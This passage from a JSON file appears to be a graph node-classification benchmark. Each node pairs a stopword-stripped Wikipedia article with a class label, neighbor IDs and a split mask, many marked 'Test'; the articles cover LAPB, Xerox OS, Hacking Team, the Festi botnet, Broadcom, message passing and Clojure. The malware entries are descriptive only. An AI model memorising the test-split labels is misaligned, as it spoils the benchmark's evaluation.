      8160,
      5863,
      2920,
      7400,
      2802
    ],
    "mask": "None"
  },
  {
    "node_id": 5021,
    "label": 5,
    "text": "LAPB:lapb link access procedure balanced lapb implements data link layer defined x.25 protocol suite lapb bit-oriented protocol derived hdlc ensures frames error free correct sequence lapb specified itu-t recommendation x.25 iso/iec 7776 implements connection-mode data link service osi reference model defined itu-t recommendation x.222 lapb used manage communication packet framing data terminal equipment dte data circuit-terminating equipment dce devices x.25 protocol stack lapb essentially hdlc asynchronous balanced mode abm lapb sessions established either dte dce station initiating call determined primary responding station secondary lapb mainly used transfer data upper layer frame flag – value flag always 0x7e order ensure bit pattern frame delimiter flag appear data field frame therefore cause frame misalignment technique known bit stuffing used transmitter receiver address field – lapb field meaning since protocol works point point mode dte network address represented layer 3 packets byte therefore put different use separates link commands responses two values 0x01 0x03 01 identifies frames containing commands dte dce responses commands dce dte 03 used frames containing commands dce dte responses dte dce therefore one side must configured layer 2 dte layer 2 dce must confuse familiar layer 1 dce dte designations control field – serves identify type frame addition includes sequence numbers control features error tracking according frame type modes operation – lapb works asynchronous balanced mode abm mode balanced i.e. master/slave relationship signified sabm e /sm frame station may initialize supervise recover errors send frames time dte dce treated equals fcs – frame check sequence enables high level physical error control allowing integrity transmitted frame data checked window size – lapb supports extended window size modulo 128 modulo 32768 maximum number outstanding frames acknowledgment raised 7 modulo 8 127 modulo 128 32767 modulo 32768 lapb master/slave node relationships sender uses poll bit command frames insist immediate response response frame bit becomes receivers final bit receiver always turns final bit response command sender poll bit set p/f bit generally used either end becomes unsure proper frame sequencing possible missing acknowledgment necessary re-establish point reference also used trigger acknowledgment outstanding i-frames following table shows addresses placed lapb frame issuing commands responses dte dce dce dte using single link operation multilink operation",
    "neighbors": [
      7360,
      9860,
      1893,
      11332,
      1127,
      3847,
      4543,
      8138,
      6544,
      1297,
      8432,
      5875,
      5118,
      10647,
      7865,
      2206,
      2431
    ],
    "mask": "Test"
  },
  {
    "node_id": 5022,
    "label": 2,
    "text": "Xerox_Operating_System:xerox operating system xerox operating system xos operating system xds sigma series computers optimized direct replacement ibm dos/360 installations provide real-time timesharing support system developed beginning 1969 xerox french firm bull xos successful europe us unable compete ibm 1972 35 xos installations europe compared 2 us",
    "neighbors": [
      2179,
      10499,
      10883,
      394,
      1147,
      1804,
      3978,
      6797,
      273,
      7057,
      6675,
      7187,
      11539,
      9366,
      11667,
      6296,
      25,
      10776,
      8092,
      4637,
      7325,
      9887,
      10016,
      9762,
      421,
      5158,
      10235,
      2345,
      7983,
      3248,
      7217,
      11184,
      6837,
      823,
      9784,
      4409,
      10809,
      6075,
      7483,
      6078,
      2811,
      576,
      9151,
      1219,
      8388,
      11075,
      4423,
      8136,
      9932,
      5840,
      5457,
      11601,
      7382,
      8410,
      10333,
      10590,
      97,
      1253,
      8551,
      8298,
      10730,
      6128,
      5363,
      5492,
      5619,
      7285,
      9335,
      2168,
      3323,
      3197,
      1150
    ],
    "mask": "Test"
  },
  {
    "node_id": 5023,
    "label": 9,
    "text": "Scilab_Image_Processing:scilab image processing sip toolbox processing images scilab sip meant free complete useful image toolbox scilab goals include tasks filtering blurring edge detection thresholding histogram manipulation segmentation mathematical morphology color image processing though sip still early development currently import output image files many formats including bmp jpeg gif png tiff xpm pcx sip uses imagemagick accomplish sip licensed gpl",
    "neighbors": [
      6797,
      8079,
      7983,
      823,
      2045
    ],
    "mask": "Test"
  },
  {
    "node_id": 5024,
    "label": 4,
    "text": "Hacking_Team:hacking team hackingteam milan-based information technology company sells offensive intrusion surveillance capabilities governments law enforcement agencies corporations remote control systems enable governments corporations monitor communications internet users decipher encrypted files emails record skype voice ip communications remotely activate microphones camera target computers company criticized providing capabilities governments poor human rights records though hackingteam states ability disable software used unethically italian government restricted license business countries outside europe hackingteam employs around 40 people italian office subsidiary branches annapolis washington d.c. singapore products use dozens countries across six continents hackingteam founded 2003 two italian entrepreneurs david vincenzetti valeriano bedeschi 2007 company invested two italian vc fondo next innogest milan police department learned company hoping use tool spy italian citizens listen skype calls police contacted vincenzetti asked help hackingteam became first sellers commercial hacking software police ” according former employee alberto pelliccione company began security services provider offering penetration testing auditing defensive capabilities clients pelliccione states malware offensive capabilities developed accounted larger percentage revenues organization pivoted offensive direction became increasingly compartmentalized pelliccione claims fellow employees working aspects platform – example android exploits payloads – would communicate one another possibly leading tensions strife within organization february 2014 report citizen lab identified organisation using hosting services linode telecom italia rackspace noc4hosts notorious bullet proof hosting company santrex july 5 2015 company suffered major data breach customer data software code internal documents e-mails see § 2015 data breach april 2nd 2019 hackingteam acquired inthecyber create memento labs hackingteam enables clients perform remote monitoring functions citizens via rcs remote control systems including da vinci galileo platforms hackingteam uses advanced techniques avoid draining cell phone batteries could potentially raise suspicions methods avoid detection malware payloads android blackberry apple ios linux mac os x symbian well microsoft windows windows mobile windows phone class operating systems rcs management platform allows operators remotely deploy exploits payloads targeted systems remotely manage devices compromised exfiltrate data remote analysis hackingteam criticized selling products services governments poor human rights records including sudan bahrain venezuela saudi arabia june 2014 united nations panel monitoring implementation sanctions sudan requested information hackingteam alleged sales software country contravention united nations weapons export bans sudan documents leaked 2015 data breach hackingteam revealed organization sold sudanese national intelligence security service access remote control system software 2012 960,000 euros response united nations panel company responded january 2015 currently selling sudan follow-up exchange hackingteam asserted product controlled weapon request beyond scope panel need disclose previous sales considered confidential business information u.n. disagreed view panel software ideally suited support military electronic intelligence elint operations may potentially fall category 'military ... equipment 'assistance related prohibited items secretary wrote march thus potential use targeting belligerents darfur conflict interest panel fall 2014 italian government abruptly froze hackingteam exports citing human rights concerns lobbying italian officials company temporarily back right sell products abroad july 5 2015 twitter account company compromised unknown individual published announcement data breach hackingteam computer systems initial message read since nothing hide 're publishing e-mails files source code ... provided links 400 gigabytes data including alleged internal e-mails invoices source code leaked via bittorrent mega announcement data breach including link bittorrent seed retweeted wikileaks many others social media material voluminous early analysis appeared reveal hackingteam invoiced lebanese army sudan spy tools also sold bahrain kazakhstan hackingteam previously claimed never done business sudan leaked data revealed zero-day cross-platform flash exploit cve number cve-2015-5119 dump included demo exploit opening calculator test webpage adobe patched hole july 8 2015 another vulnerability involving adobe revealed dumps took advantage buffer overflow attack adobe open type manager dll included microsoft windows dll run kernel mode attack could perform privilege escalation bypass sandbox also revealed leaked data hackingteam employees use weak passwords including 'p4ssword 'wolverine 'universo hours without response hackingteam member christian pozzi tweeted company working closely police attackers claiming regarding company true also claimed leaked archive contains virus constituted false info shortly tweets pozzi twitter account apparently compromised responsibility attack claimed hacker known phineas fisher phisher twitter phineas previously attacked spyware firm gamma international produce malware finfisher governments corporations 2016 phineas published details attack spanish english how-to others explained motivations behind attack internal documents revealed details hackingteam contracts repressive governments 2016 italian government revoked company license sell spyware outside europe without special permission hackingteam clientele include governments also corporate clients barclay bank british telecom bt united kingdom well deutsche bank germany full list hackingteam customers leaked 2015 breach disclosed documents show hackingteam 70 current customers mostly military police federal provincial governments total company revenues disclosed exceeded 40 million euros",
    "neighbors": [
      1024,
      5636,
      10756,
      3092,
      4117,
      8726,
      535,
      9761,
      4644,
      4133,
      1087,
      9791,
      1608,
      3657,
      2634,
      8779,
      4703,
      8288,
      8292,
      10875,
      3711,
      8320,
      7809,
      127,
      5764,
      2187,
      6797,
      4240,
      1169,
      2709,
      1688,
      2717,
      9375,
      2208,
      2734,
      9904,
      9395,
      6326,
      8886,
      3789,
      4304,
      4314,
      9435,
      4830,
      3807,
      1251,
      5349,
      1254,
      3819,
      10477,
      9460,
      7418,
      2815,
      3843,
      10502,
      8978,
      10003,
      297,
      2857,
      8489,
      11052,
      9518,
      7983,
      823,
      1337,
      11089,
      6484,
      857,
      1882,
      7515,
      4957,
      5986,
      3428,
      3944,
      6504,
      4972,
      3956,
      9082,
      11152,
      10132,
      1440,
      5024,
      5028,
      11175,
      5547,
      7601,
      1970,
      441,
      1979,
      4027,
      9664,
      1473,
      1474,
      8133,
      4054,
      7639,
      8664,
      1504,
      10208,
      9186,
      1515,
      8172,
      2542,
      4085,
      507
    ],
    "mask": "Test"
  },
  {
    "node_id": 5025,
    "label": 4,
    "text": "Festi:festi festi rootkit botnet created basis works operating systems windows family autumn 2009 first time festi came view companies engaged development sale antivirus software time estimated botnet consisted roughly 25.000 infected machines spam volume capacity roughly 2.5 billion spam emails day festi showed greatest activity 2011-2012 recent estimates dated august 2012 display botnet sending spam 250,000 unique ip addresses quarter total amount one million detected ip sending spam mails main functionality botnet festi spam sending implementation cyberattacks like distributed denial service distribution carried scheme ppi pay-per-install use preventing detection antiviruses loader extends ciphered complicates signature based detection represented data architecture botnet gathered research eset antivirus company loader downloads sets bot represents kernel-mode driver adds list drivers launching together operating system hard disk drive part bot stored responsible communication command center loading modules starting bot periodically asks command center receiving configuration loading modules jobs necessary execution researches carried specialists antivirus company eset known festi least two modules one intends spam sending botspam.dll another implementation cyberattacks like distributed denial service botdos.dll module implementation cyberattacks like distributed denial service supports following types cyberattacks namely tcp-flood udp-flood dns-flood http -flood also flood packets random number issue used protocol expert kaspersky lab researching botnet drew output modules used list includes module socks-server implementation botsocks.dll tcp udp protocols module remote viewing control computer user botremote.dll module implementing search disk remote computer local area network botsearch.dll remote computer connected grabber-modules browsers known present time botgrabber.dll modules never saved hard disk drive almost impossible detection bot uses client-server model functioning implements protocol network interaction command center used receiving configuration botnet loading modules also obtaining jobs command center notification command center execution data encoded interferes determination contents network traffic case installation bot switches system firewall hides kernel-mode driver keys system registry necessary loading operation protects registry keys deleting operation network occurs low level allows bypass network filters antivirus software easily use network filters observed prevent installation bot checks whether launched virtual machine case positive result check stops activities festi periodically checks existence debugger able remove breakpoints festi created use object-oriented technology software development strongly complicates researches method reverse engineering bot easily ported operating systems control botnet festi implemented means web interface carried via browser according specialists antivirus company eset american journalist blogger brian krebs expert information security field according american journalist new york times newspaper andrew kramer also sources close russian intelligence services architect developer botnet festi — russian hacker igor artimovich conclusion possible tell botnet festi one powerful botnets sending spam carrying attacks like distributed denial service principles festi botnet constructed increase bot lifetime system much possible hinder bot detection antivirus software network filters mechanism modules allows expand functionality botnet side means creation loading necessary modules achievement different purposes object-oriented approach development complicates botnet researching use methods reverse engineering gives chance bot porting operating systems accurate demarcation specific concrete operating system functionality remaining logic bot powerful systems counteraction detection debugging make festi bot almost invisible stealthy system bindings use reserve command centers gives chance restoration control botnet change command center festi atypical example malicious software authors approached process development extremely seriously",
    "neighbors": [
      7809,
      131,
      2213,
      8805,
      8998,
      2222,
      4689,
      4883,
      9688,
      7515,
      10173,
      9791
    ],
    "mask": "Test"
  },
  {
    "node_id": 5026,
    "label": 5,
    "text": "Beaker_(web_browser):beaker web browser beaker free open-source web browser currently development blue link labs beaker browser peer-to-peer technology allow users self-publish websites web apps directly browser without need set administrate separate web server host contents third-party server files websites transferred using dat hypermedia peer-to-peer protocol allows files shared hosted several users browser also supports http protocol connect traditional servers beaker built using electron framework therefore uses chromium browser renderer webpages files stored local folder published dat website made accessible users peer-to-peer protocol files seeded local folder browser active make also available browser closed user may use several alternative options host content",
    "neighbors": [
      513,
      6657,
      9736,
      2579,
      6171,
      9757,
      7713,
      10791,
      9770,
      559,
      4661,
      3639,
      10808,
      3643,
      9275,
      64,
      5707,
      10834,
      6231,
      8281,
      6747,
      3676,
      1642,
      9834,
      9841,
      115,
      9843,
      4728,
      637,
      1664,
      2182,
      6797,
      10910,
      8351,
      7340,
      9394,
      9908,
      185,
      11449,
      4797,
      11466,
      7885,
      11469,
      9424,
      4310,
      2777,
      8923,
      225,
      737,
      4326,
      8443,
      9987,
      7943,
      278,
      10522,
      7965,
      1834,
      7983,
      823,
      10057,
      11082,
      2893,
      8557,
      6528,
      3971,
      3462,
      8584,
      7572,
      944,
      5054,
      8640,
      6086,
      4048,
      5078,
      479,
      10722,
      5605,
      487,
      8169,
      494,
      1520,
      7152,
      6133,
      5622,
      5114
    ],
    "mask": "None"
  },
  {
    "node_id": 5027,
    "label": 2,
    "text": "OPOS:opos opos full name ole retail pos platform specific implementation unifiedpos point sale device standard microsoft windows operating systems initiated microsoft ncr epson fujitsu-icl managed association retail technology standards opos api first published january 1996 standard uses component object model languages support com controls i.e visual c++ visual basic c used write applications opos standard specifies two levels opos control control object presents abstract hardware interface family devices receipt printer service object handles interface control object actual physical device specific model receipt printer division functionality provides way application development write abstract hardware interface allowing application work variety different hardware requirement hardware vendor supplies opos compatible service object particular hardware offering typically manufacturer point sale terminals provide along terminal operating system opos control object package software utility used configure opos settings utility specify settings opos control object indicate service object used particular opos profile point sale application starts loads opos control object opos control object turn loads service object specified current opos profile windows registry typically used persistent store device settings hardware device manufacturer normally provide utility device specific settings used service object opos deployed following operating systems",
    "neighbors": [
      8576,
      9137,
      10029,
      847
    ],
    "mask": "Test"
  },
  {
    "node_id": 5028,
    "label": 3,
    "text": "Broadcom_Corporation:broadcom corporation broadcom corporation american fabless semiconductor company made products wireless broadband communication industry acquired avago technologies 2016 operates wholly owned subsidiary merged entity broadcom inc. broadcom corporation founded professor-student pair henry samueli henry nicholas ucla 1991 1995 company moved westwood los angeles office irvine california 1998 broadcom became public company nasdaq exchange ticker symbol brcm employs 11,750 people worldwide 15 countries broadcom among gartner top 10 semiconductor vendors revenue broadcom first landed fortune 500 2009 2012 broadcom total revenue 8.01 billion 2013 broadcom stood 327 fortune 500 climbed 17 places 2012 ranking 344 may 28 2015 chip maker avago technologies ltd. agreed buy broadcom corp. 37 billion cash stock closing completed february 1 2016 broadcom shareholders held 32 new singapore-based company called broadcom limited hock tan avago president ceo named ceo new combined company dr. samueli became chief technology officer member combined company board dr. nicholas serves strategic advisory role within new company new merged entity named broadcom limited inherits ticker symbol avgo brcm ticker symbol retired may 2016 cypress semiconductor announced acquire broadcom corporation full portfolio iot products 550 million deal cypress acquires broadcom iot products intellectual property wi-fi bluetooth zigbee connectivity well broadcom wiced platform sdk developers deal combined broadcom developer tools connectivity technologies iot devices cypress programmable system-on-a-chip soc products provide memory computing graphics processing low-power devices april 26 2009 broadcom settled four years legal battles wireless patents qualcomm inc. another fabless semiconductor company headquartered san diego california deal ended patent litigation well complaints anti-competitive behavior trade commissions united states europe south korea part settlement qualcomm paid 891 million cash broadcom four-year period ending june 2013 june 2007 u.s. international trade commission blocked import new cell phone models based particular qualcomm microchips found qualcomm microchips infringe patents owned broadcom january 2017 ftc sued qualcomm allegedly engaging unlawful tactics maintain monopoly cellular-communications chips january 17 2018 reported ftc investigating whether broadcom engaged anti-competitive tactics negotiations customers probe ongoing several months july 14 2006 broadcom announced subtract 750 million earnings due stock options irregularities september 8 2006 amount doubled 1.5 billion company may also owe additional taxes january 24 2007 announced restatement financial results 1998 2005 totaled 2.22 billion may 15 2008 broadcom cto samueli resigned chairman board took leave absence chief technology officer named civil complaint u.s. securities exchange commission sec june 5 2008 broadcom co-founder former ceo henry nicholas former cfo william ruehle indicted charges illegal stock-option backdating nicholas also indicted violations federal narcotics laws however december 2009 federal judge cormac j. carney threw options backdating charges nicholas ruehle finding federal prosecutors improperly tried prevent three defense witnesses testifying broadcom product line spans computer telecommunication networking company products enterprise/metropolitan high-speed networks well products soho small-office home-office networks products include transceiver processor ics ethernet wireless lans cable modems digital subscriber line dsl servers home networking devices router switches port-concentrators cellular phones gsm/gprs/edge/w-cdma/lte also known series high-speed encryption co-processors offloading processor-intensive work dedicated chip thus greatly speeding tasks utilize encryption many practical benefits e-commerce pgp gpg secure communications company also produces ics carrier access equipment audio/video processors digital set-top boxes digital video recorders bluetooth wi-fi transceivers rf receivers/tuners satellite tv major customers include apple hewlett-packard motorola ibm dell asus lenovo linksys logitech nintendo nokia nortel avaya tivo tenda cisco systems september 2011 broadcom shut digital tv operations broadcom also shut blu-ray chip business closure businesses began september 19 2011 june 2 2014 broadcom announced intentions exit cellular baseband business vendors included broadcom nics products example dell poweredge m-series blade-server products may fitted dell-supplied dual port broadcom netxtreme 5709 gigabit ethernet port adapters another large market hardware switches vendors offer switching equipment based broadcom hardware firmware e.g dell powerconnect classics well-known vendors use broadcom hardware write firmware latest broadcom trident+ asic used many high-speed 10gb+ switches largest switch-vendors cisco nexus switches running nx-os dell force10 dell networking running ftos/dnos arista 7050-series switches ibm/bnt 8264 juniper qfx3500 latest 'member trident family trident ii xgs support 32 x 40g ports 104 x 10g ports mix single chip examples switches using trident ii xgs chip dell networking s6000 cisco nexus 9000 smaller vendors like edgecore as6700 penguin arctica 3200xl quantamesh t5032 videocore gpu found systems-on-a-chip soc broadcom widely known one bcm2835 containing videocore iv found raspberry pi broadcom crystal hd video acceleration broadcom bcm43 series chips provide wifi support many android iphone devices models include bcm4339 used phones nexus 5 2013 bcm4361 used samsung galaxy s8 2017 soc devices cortex r4 processing mac mlme layers proprietary broadcom processor 802.11 physical layer chips also handle wi-fi direct bluetooth nfc april 2017 google project zero investigated broadcom soc wifi stack found lacked basic exploit mitigations including stack cookies safe unlinking access permission protection allowing full device takeover wi-fi proximity alone requiring user interaction numerous smartphones apple samsung google affected broadcom authored voip codecs 2002 released open source lgpl license 2009 free open source drivers available included linux kernel source tree 802.11b/g/a/n family wireless chips broadcom produces since release 2.6.26 kernel broadcom chips kernel support require external firmware built 2003 free software foundation accused broadcom complying gnu general public license broadcom distributed gpl code driver 802.11g router chipset without making code public chipset adopted linksys later purchased cisco cisco eventually published source code firmware wrt54g wireless broadband router gpl-license 2012 linux foundation listed broadcom one top 10 companies contributing development linux kernel 2011 placing top 5 percent estimated 226 contributing companies foundation linux kernel development report also noted course year broadcom submitted 2,916 changes kernel october broadcom released parts raspberry pi userland bsd-style license according raspberry pi foundation made first arm-based multimedia soc fully functional vendor-provided opposed partial reverse-engineered fully open-source drivers although due substantial binary firmware code must executing parallel operating system executes independently prior loading operating system claim universally accepted broadcom provided linux driver broadcom crystal hd also hired eric anholt former intel employee work free open-source graphics device driver videocore iv broadcom organizes fabrication processor chip recently bcm2837 chip wifi processor bcm43438 used charitable raspberry pi foundation foundation requested help broadcom making raspberry pi card motherboard free drm corporate control kind interact hardware bought controlled children jericho2 programmable ethernet switch chip 10 tb/s switching capacity per device tomahawk 3 series supports high-density standards based 400gbe 200gbe 100gbe switching routing hyperscale cloud networks broadcom divulged bringing two variants tomahawk-3 market first full-tilt-boogie 12.8 tb/sec 256 serdes fired supporting 32 ports 400 gb/sec 64 ports 200 gb/sec 128 ports 100 gb/sec second variant tomahawk-3 160 256 serdes fired delivers 8 tb/sec aggregate bandwidth broadcom suggesting 80 ports 100 gb/sec 48 ports 100 gb/sec plus either 8 ports 400 gb/sec 16 ports 200 gb/sec 96 ports 50 gb/sec plus either 8 ports 400 gb/sec 16 ports 200 gb/sec broadcom known fabless company outsources semiconductor manufacturing foundries globalfoundries semiconductor manufacturing international corporation silterra tsmc united microelectronics corporation company based irvine california university research park university california irvine campus 2007 move previous campus near irvine spectrum many research development sites including silicon fen cambridge uk bangalore hyderabad india richmond near vancouver markham near toronto canada sophia antipolis france september 2011 broadcom bought netlogic microsystems deal 3.7 billion cash excluding around 450 million netlogic employee shareholdings transfer broadcom besides netlogic microsystems acquisition years broadcom acquired many smaller companies quickly enter new markets broadcom logo designed eliot hochberg based logo company previous name broadband telecom broadband telecom logo designed co-founder henry nicholas then-wife stacey nicholas inspired mathematical sinc function 2009 company founded broadcom foundation non-profit corporation 50m investment direction henry samueli company co-founder broadcom chief executive scott mcgregor cited history science fair involvement factor success mcgregor named foundation first president chairman",
    "neighbors": [
      1024,
      4609,
      2050,
      4098,
      9732,
      11267,
      8711,
      11282,
      9235,
      535,
      11289,
      4124,
      1057,
      9761,
      4644,
      4133,
      38,
      4139,
      8237,
      2097,
      8253,
      10303,
      7745,
      7234,
      7747,
      1608,
      3657,
      2635,
      8779,
      8283,
      4703,
      8288,
      99,
      8292,
      6247,
      9320,
      6250,
      6252,
      6253,
      8812,
      6256,
      5237,
      10361,
      9851,
      10875,
      638,
      3711,
      8320,
      11391,
      644,
      5764,
      8327,
      9863,
      8842,
      2187,
      11405,
      4240,
      146,
      659,
      1688,
      7833,
      666,
      5786,
      2717,
      9375,
      4258,
      8355,
      4773,
      9904,
      6834,
      9395,
      8886,
      9913,
      8383,
      10945,
      196,
      5322,
      3789,
      4304,
      4821,
      4314,
      9435,
      10971,
      3807,
      2788,
      5349,
      1254,
      9964,
      10477,
      7411,
      9460,
      6391,
      760,
      3323,
      3835,
      2814,
      2815,
      3843,
      10502,
      5384,
      781,
      783,
      10003,
      10016,
      8481,
      5417,
      8489,
      3883,
      10537,
      11052,
      2862,
      9518,
      7988,
      11062,
      1849,
      6971,
      10562,
      8003,
      6981,
      6474,
      5963,
      1871,
      1872,
      2388,
      6484,
      857,
      1882,
      6495,
      1377,
      9569,
      11629,
      6001,
      3956,
      373,
      1400,
      9082,
      3451,
      392,
      11152,
      1428,
      10132,
      4508,
      7068,
      1440,
      5024,
      10658,
      7077,
      9638,
      11175,
      424,
      6057,
      426,
      938,
      4011,
      5547,
      9137,
      1970,
      441,
      1979,
      4027,
      10173,
      9155,
      9163,
      7631,
      6608,
      980,
      9685,
      4054,
      9174,
      10199,
      2524,
      9182,
      1504,
      9186,
      2542,
      1014,
      3575,
      507
    ],
    "mask": "None"
  },
  {
    "node_id": 5029,
    "label": 7,
    "text": "Message_passing:message passing computer science message passing technique invoking behavior i.e. running program computer invoking program sends message process may actor object relies process supporting infrastructure select invoke actual code run message passing differs conventional programming process subroutine function directly invoked name message passing key models concurrency object-oriented programming message passing used ubiquitously modern computer software used way objects make program work means objects systems running different computers e.g. internet interact message passing may implemented various mechanisms including channels message passing technique invoking behavior i.e. running program computer contrast traditional technique calling program name message passing uses object model distinguish general function specific implementations invoking program sends message relies object select execute appropriate code justifications using intermediate layer essentially falls two categories encapsulation distribution encapsulation idea software objects able invoke services objects without knowing caring services implemented encapsulation reduce amount coding logic make systems maintainable e.g. rather if-then statements determine subroutine function call developer send message object object select appropriate code based type one first examples used domain computer graphics various complexities involved manipulating graphic objects example simply using right formula compute area enclosed shape vary depending shape triangle rectangle ellipse circle traditional computer programming would result long if-then statements testing sort object shape calling appropriate code object-oriented way handle define class called codice_1 subclasses codice_2 codice_3 turn subclasses codice_4 codice_5 simply send message codice_1 asking compute area codice_1 object invoke subclass method formula appropriate kind object distributed message passing provides developers layer architecture provides common services build systems made sub-systems run disparate computers different locations different times distributed object sending message messaging layer take care issues synchronous message passing occurs objects running time used object-oriented programming languages java smalltalk synchronous messaging analogous synchronous function call function caller waits function completes sending process waits receiving process completes make synchronous communication unworkable applications example large distributed systems may perform well enough usable large distributed systems may need operate subsystems maintenance etc imagine busy business office 100 desktop computers send emails using synchronous message passing exclusively one worker turning computer cause 99 computers freeze worker turns computer back process single email asynchronous message passing receiving object busy requesting object sends message continuing function call analogy like function call returns immediately without waiting called function complete messages sent queue stored receiving process requests receiving process processes messages sends results queue pickup original process designated next process asynchronous messaging requires additional capabilities storing retransmitting data systems may run concurrently generally handled intermediary level software often called middleware common type message-oriented middleware mom buffer required asynchronous communication cause problems full decision made whether block sender whether discard future messages blocked sender may lead deadlock messages dropped communication longer reliable synchronous communication built top asynchronous communication using synchronizer example α-synchronizer works ensuring sender always waits acknowledgement message receiver sender sends next message acknowledgement received hand asynchronous communication also built top synchronous communication example modern microkernels generally provide synchronous messaging primitive asynchronous messaging implemented top using helper threads message-passing systems use either distributed local objects distributed objects sender receiver may different computers running different operating systems using different programming languages etc case bus layer takes care details converting data one system another sending receiving data across network etc remote procedure call rpc protocol unix early example note type message passing requirement sender receiver use object-oriented programming procedural language systems wrapped treated large grained objects capable sending receiving messages examples systems support distributed objects onc rpc corba java rmi dcom soap .net remoting ctos qnx neutrino rtos openbinder d-bus distributed object systems called shared nothing systems message passing abstraction hides underlying state changes may used implementation sending messages distributed asynchronous message-passing additional overhead compared calling procedure message-passing arguments must copied new message arguments contain megabytes data must copied transmitted receiving object traditional procedure calls differ message-passing terms memory usage transfer time locality arguments passed receiver typically general purpose registers requiring additional storage transfer time parameter list containing arguments addresses bits address-passing possible distributed systems since systems use separate address spaces web browsers web servers examples processes communicate message-passing url example referencing resource without exposing process internals subroutine call method invocation exit invoked computation terminated asynchronous message-passing contrast result response arriving significant time request message sent message-handler general process messages one sender means state change reasons unrelated behavior single sender client process contrast typical behavior object upon methods invoked latter expected remain state method invocations words message-handler behaves analogously volatile object prominent mathematical models message passing actor model pi calculus mathematical terms message single means pass control object object responds message method message alan kay argued message passing important objects oop objects often over-emphasized live distributed objects programming model builds upon observation uses concept distributed data flow characterize behavior complex distributed system terms message patterns using high-level functional-style specifications",
    "neighbors": [
      9224,
      9225,
      4107,
      4622,
      7187,
      7699,
      8725,
      9248,
      545,
      8229,
      6694,
      1586,
      58,
      8252,
      9791,
      9794,
      8275,
      8304,
      3705,
      1152,
      7318,
      9366,
      9887,
      2222,
      7880,
      2262,
      8406,
      225,
      8929,
      10470,
      4333,
      5363,
      2804,
      10486,
      256,
      1280,
      11027,
      10007,
      1826,
      7461,
      10024,
      11049,
      8499,
      318,
      10048,
      4417,
      10051,
      8015,
      6487,
      5976,
      5471,
      1889,
      11618,
      11123,
      5492,
      10104,
      2432,
      2945,
      10626,
      8069,
      7057,
      1435,
      6555,
      11675,
      2980,
      428,
      4525,
      10675,
      8122,
      3517,
      968,
      10198,
      3034,
      5594,
      6624,
      3558,
      4589,
      10739,
      2039,
      511
    ],
    "mask": "Test"
  },
  {
    "node_id": 5030,
    "label": 9,
    "text": "Rule_of_least_power:rule least power programming rule least power design principle suggests choosing least powerful computer language suitable given purpose stated alternatively given choice among computer languages classes range descriptive declarative procedural less procedural descriptive language one chooses one data stored language rule application principle least privilege protocol design originally proposed axiom good design term extension kiss principle applied choosing among range languages ranging explained tim berners-lee",
    "neighbors": [
      10413,
      10835,
      10452,
      2901,
      502
    ],
    "mask": "None"
  },
  {
    "node_id": 5031,
    "label": 9,
    "text": "Clojure:clojure clojure like closure modern dynamic functional dialect lisp programming language java platform. ref name= platform/android /ref like lisps clojure treats code data lisp macro system. ref name= reference/lisps /ref current development process community-driven ref name= dev/dev /ref overseen rich hickey benevolent dictator life bdfl clojure advocates immutability immutable data structures encourages programmers explicit managing identity states. ref name= about/state /ref focus programming immutable values explicit progression-of-time constructs intended facilitate developing robust especially concurrent programs. ref name= about/rationale /ref ref name= msdn/inside-clojure /ref type system entirely dynamic recent efforts also sought implementation gradual typing commercial support clojure provided cognitect annual clojure conferences organized every year across globe famous clojure/conj rich hickey creator clojure language clojure developed dotlisp similar project based .net platform three earlier attempts provide interoperability lisp java java foreign language interface common lisp jfli foreign object interface lisp foil lisp-friendly interface java servlets lisplets hickey spent 2½ years working clojure releasing publicly much time working exclusively clojure outside funding end time hickey sent email announcing language friends common lisp community development process community-driven managed clojure jira project page issues may filed general development discussion occurs clojure google group anyone submit issues ideas contribute patches one must sign clojure contributor agreement jira issues processed team screeners finally rich hickey approves changes rich hickey developed clojure wanted modern lisp functional programming symbiotic established java platform designed concurrency clojure approach state characterized concept identities represented series immutable states time since states immutable values number workers operate parallel concurrency becomes question managing changes one state another purpose clojure provides several mutable reference types well-defined semantics transition states clojure runs java platform result integrates java fully supports calling java code clojure ref name= about/jvm_hosted /ref clojure code called java also community uses leiningen project automation providing support maven integration leiningen handles project package management dependencies configured using clojure syntax like lisps clojure syntax built s-expressions first parsed data structures reader compiled. ref name= reference/reader /ref clojure reader supports literal syntax maps sets vectors addition lists compiled mentioned structures directly clojure lisp-1 intended code-compatible dialects lisp since uses set data structures incompatible lisps lisp dialect clojure supports functions first-class objects read–eval–print loop repl macro system clojure lisp macro system similar common lisp exception clojure version backquote termed syntax quote qualifies symbols namespace helps prevent unintended name capture binding namespace-qualified names forbidden possible force capturing macro expansion must done explicitly clojure allow user-defined reader macros reader supports constrained form syntactic extension clojure supports multimethods interface-like abstractions protocol based polymorphism data type system using records providing high-performance dynamic polymorphism designed avoid expression problem clojure support lazy sequences encourages principle immutability persistent data structures functional language emphasis placed recursion higher-order functions instead side-effect-based looping automatic tail call optimization supported jvm support natively possible explicitly using codice_1 keyword parallel concurrent programming clojure provides software transactional memory reactive agent system channel-based concurrent programming clojure 1.7 introduced reader conditionals allowing embedding clojure clojurescript code namespace transducers added method composing transformations transducers enable higher-order functions map fold generalize source input data traditionally functions operate sequences transducers allow work channels let user define models transduction primary platform clojure java target implementations exist notable clojurescript compiles ecmascript 3 clojureclr full port .net platform interoperable ecosystem survey clojure community 1,060 respondents conducted 2013 found 47 respondents used clojure clojurescript working clojure 2014 number increased 55 2015 based 2,445 respondents 66 popular clojurescript projects include implementations react library reagent re-frame rum om continued interest functional programming clojure adoption software developers java platform kept increasing language also either preferred recommended renowned software development veterans james gosling paul graham robert c. martin colloquially known uncle bob jvm ecsosystem report 2018 claimed largest survey ever java developers prepared collaboration snyk java magazine clojure ranked 2nd used programming language behind java main applications clojure used industry firms apple atlassian funding circle netflix puppet walmart well government agencies nasa also used creative computing including visual art music games poetry thoughtworks assessing functional programming languages technology radar expressed favor toward clojure simple elegant implementation lisp jvm 2010 promoted status adopt 2012 growing number unofficial experimental implementations platforms testify popularity language tooling clojure development seen significant improvement years following list popular ides/editors plug-ins combined provide excellent support clojure development addition tools provided community official clojure cli tools ref name= guides/deps_and_cli /ref also become available gnu/linux macos windows since clojure 1.9 following examples run clojure repl one started clojure cli tools online repl one available repl.it strong emphasis simplicity typical clojure programs consist mostly functions simple data structures i.e. lists vectors maps sets like lisps one iconic features clojure interactive programming repl note following examples codice_2 starts line comment codice_3 indicates output unlike runtime environments names get compiled away clojure runtime environment easily introspectable using normal clojure data structures similar lisps clojure homoiconic also known code data example see easy write code modifies code threading macros codice_4 codice_5 friends syntactically express abstraction piping collection data series transformations also achieved efficiently using transducers thread-safe generator unique serial numbers though like many lisp dialects clojure built-in codice_6 function uses internally 